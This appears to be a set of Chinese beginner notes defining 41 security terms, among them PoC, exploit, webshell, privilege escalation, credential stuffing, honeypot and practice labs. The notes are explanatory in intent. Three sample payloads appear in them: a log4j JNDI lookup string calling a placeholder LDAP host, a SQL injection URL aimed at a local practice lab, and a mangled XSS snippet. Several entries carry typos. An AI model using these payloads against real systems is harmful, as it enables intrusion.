1、黑客(hacker)---对计算机技术非常擅长的人,窃取数据,破坏计算机系统
2、脚本小子---刚刚入门安全行业,学习了一些技术,指挥使用现成的工具或者从网上复制代码。
3、白帽子---白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题(360补天,漏洞盒子,CNVD,CNNVD)
4、红帽黑客---有正义感,爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。
5、漏洞(英文vulneability):
漏洞指的是硬件,软件按协议等等存在的安全缺陷
6、POC (Proof of Concept)
能证明漏洞存在的代码 例:S{jndi:ldap://xxxxxx.dnslong.cn/test}
7、exp(Exploit--利用)
执行了这一段利用代码之后,就能够达到攻击的目的。
8、payload:载荷
①SQL注入(http://localhost/sqli-labs/;ess-3/?id=-1' union select 1,1.database()--+)
②XSS (< >(1)< />) 空格去掉
③log4j ${jndi:ldap://xxxxx/dms;pg.cn/test}
9、0day:使用量非常大的产品被发现 官方还未发布补丁和恢复
10、1day:漏洞被公开但是公布时间段导致还没有大范围的补丁修复
11、Nday漏洞:漏洞公开并且已经过去比较长的时间的漏洞
12、漏扫:基于数据库对漏洞进行自动化扫描 AWVS appscan
13、补丁:patch 漏洞修复程序
14、渗透:pennetration 黑客入侵获取权限的过程
15、渗透测试:pennetration test 授权后的入侵获取权限
16、木马:Trojan house 隐藏在系统中的恶意程序
17、病毒:Virus 恶意代码或程序
18、杀毒软件:瑞星 金山 卡巴斯基 360
19、免杀 :绕过杀毒软件
20、肉鸡:被黑客获取了控制权限的机器,可能是个人电脑也可能是企业的服务器
21、抓鸡:通过漏洞,自动化的获取肉鸡的行为
22、跳板机:自己的电脑容易被溯源,所以通过肉鸡的电脑进行转接
23、DDOS:Distributed Denial of Service 分布式拒绝服务攻击 发起大量恶意请求,导致正常用户无法访问
24、后门:backdoor 黑客为了对主机进行长期控制,在计算机上种植的一段程序或留下的一个“入口”,木马可能会充当后门
25、中间人攻击 在客户端与服务器之间布置一台黑客的服务器作为中转,从而窃取、篡改用户请求服务信息
26、网络钓鱼 冒充网站,窃取用户的账号密码
27、webshell shell是一种命令执行工具,可以对计算机进行控制asp php jsp之外的代码文件,可以通过这些代码文件可以执行任意的命令,对计算机做任意的操作,分为小马(仅有文件上传功能)、一句话木马,通过一些网站管理工具来连接、大马,一个有可操作界面的木马
28、Getshell 获得执行命令的环境(redis持久化 mysql写文件的功能 mysql的日志记录功能 上传功能 数据备份功能 编辑器)
29、提权 通过漏洞使得自己获取的一个用户权限升级为管理员权限
30、拿站 拿到了最高权限
31、拖库 把网站的全部数据导出了
32、撞库 获取裤子去批量登录其他网站,因为部分人建立账号密码都相同
33、旁站入侵 入侵同服务器的其他网站
34、横向移动 攻击者入侵一台服务器陈恭候,基于内部网络,继续入侵同网段的其他机器
35、代理 Proxy 带我们发起网络请求的一台服务器
36、VPN Virtual Private Network 代理 加密通信 办公-在家里连到公司内网
37、 蜜罐 Honeypot 吸引攻击者攻击的伪装系统,用来实现溯源和反制 免费蜜罐HFish
38、沙箱 Sandbox 沙箱是一种按照安全策略限制程序行为的执行环节,就算用恶意代码,也只能影响沙箱环境而不会影响到操作系统 云沙箱-微步
39、靶场 模拟有漏洞的环境 可以是网站、容器、操作系统等
①web综合靶场-DVWA pikachu bwapp
②web专用靶场-sqli-labs、upload-labs、xss-labs
③漏洞复现靶场-比如CVE 44228
④操作系统靶场-vulnhub
⑤CTF靶场-专门用来联系CTF题目,每个人都有一个独立的环境
40、堡垒机 跳板机 运维审计系统-管理一些资源、用户、虚拟机等
41、WAF Web Application Firewall 网络应用防火墙 对HTTP和HTTPS的流量内容进行分析、拦截恶意攻击行为